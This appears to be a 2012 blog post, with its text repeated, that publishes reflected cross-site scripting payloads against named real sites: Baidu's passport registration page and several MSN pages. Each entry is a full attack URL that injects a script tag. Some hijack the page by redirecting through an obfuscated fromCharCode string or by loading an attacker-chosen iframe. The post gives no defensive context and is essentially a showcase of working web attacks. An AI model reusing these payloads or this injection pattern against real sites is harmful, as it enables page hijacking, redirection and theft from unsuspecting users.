Twitter Go on Twitter

Cross-site scripting flaws in Baidu and MSN

Sony st2tea.blogspot.com


...in baidu.com

https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script>

...in .msn 


http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >


http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss


http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script>


...simple 

Blog

21 March 2012

Cross-site scripting flaws in Baidu and MSN

at 7:45 PM
Sony st2tea.blogspot.com


...in baidu.com

https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script>

...in .msn 


http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >


http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss


http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script>


...simple